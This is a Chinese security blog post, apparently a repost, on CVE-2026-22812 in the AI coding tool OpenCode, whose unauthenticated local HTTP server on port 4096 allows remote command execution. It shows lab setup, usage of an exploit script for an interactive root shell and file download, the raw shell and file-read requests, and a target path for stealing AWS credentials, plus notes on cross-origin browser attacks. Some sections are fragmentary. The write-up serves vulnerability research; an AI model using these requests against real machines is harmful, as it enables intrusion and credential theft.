文章总结： 本文介绍了一个名为CVE-2026-22812的安全漏洞，该漏洞存在于拥有7.1万Star的AI编码工具OpenCode中。其核心问题是，该工具在启动时会在本地4096端口开启一个完全没有身份认证的HTTP服务，攻击者可以通过这个服务直接执行任意命令、读取文件，甚至窃取AWS凭证等敏感数据。这本质上是一个零认证RCE后门，并且由于服务允许跨域访问，攻击者还可以构造恶意网页来攻击用户。 综合评分： 95 文章分类： AI安全,WEB安全,漏洞分析,渗透测试,恶意软件

CVE-2026-22812：我是如何在一个 7.1 万 Star 的 AI 编码工具上实现“零认证 RCE”的

haidragon haidragon

安全狗的自我修养

2026年3月23日 12:18 湖南

• # 官网：http://securitytech.cc

• OpenCode 在启动时会在本地 4096 端口开启 HTTP 服务，但：

  👉 完全没有认证

  任何人都可以：

## 漏洞示意

## 什么是 OpenCode？

OpenCode 是一个 AI 编码工具：

👉 启动时会开启本地 HTTP 服务（IPC）

❗但这个服务没有认证

## Lab 环境

### Step 1 — Ubuntu 容器

  docker run --rm-it ubuntu
  apt update && apt install gitwget tmux python3 -y

### Step 2 — 安装依赖

  pip3 install requests urllib3 --break-system-packages

### Step 3 — 下载 exploit

  wget exploit.py
  tar -xvzf opencode-linux-x64.tar.gz

### Step 4 — 启动 OpenCode

  ./opencode

## 漏洞利用

### 查看 exploit 功能

  python3 exploit.py -t

### 交互式 Shell（RCE）

  python3 exploit.py -t http://127.0.0.1:4096 -i

  whoami
  root

### API 返回

  {
    "output": "root"
  }

### 单命令执行

  python3 exploit.py -c"id"

### 读取文件

  --download /etc/hosts

### 窃取 AWS 凭证

  --download /root/.aws/credentials

## 漏洞原理

### 1️⃣ 创建 session

  POST /session
  {}

### 2️⃣ 执行命令

  POST /session/{id}/shell

  { "command": "whoami" }

### 3️⃣ 读取文件

  GET /file/content?path=/root/.aws/credentials

## ⚠️ 浏览器攻击

  Access-Control-Allow-Origin: *

👉 任意网站 JS 都可以访问本地服务

等于：

## 总结

👉 本质就是：

本地服务 + 无认证 + 可执行命令 = 直接后门

• 打开恶意网页

• 自动执行命令

• 自动偷数据

• 在终端运行

• 自动写代码 / 修改 / 执行

• 支持 GPT / Claude

• 执行命令（RCE）

• 读取文件

• 窃取敏感数据

• 公众号:安全狗的自我修养

• vx:2207344074

• http://gitee.com/haidragon

• http://github.com/haidragon

• bilibili:haidragonx

• 

#

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全狗的自我修养 haidragon haidragon《CVE-2026-22812：我是如何在一个 7.1 万 Star 的 AI 编码工具上实现“零认证 RCE”的》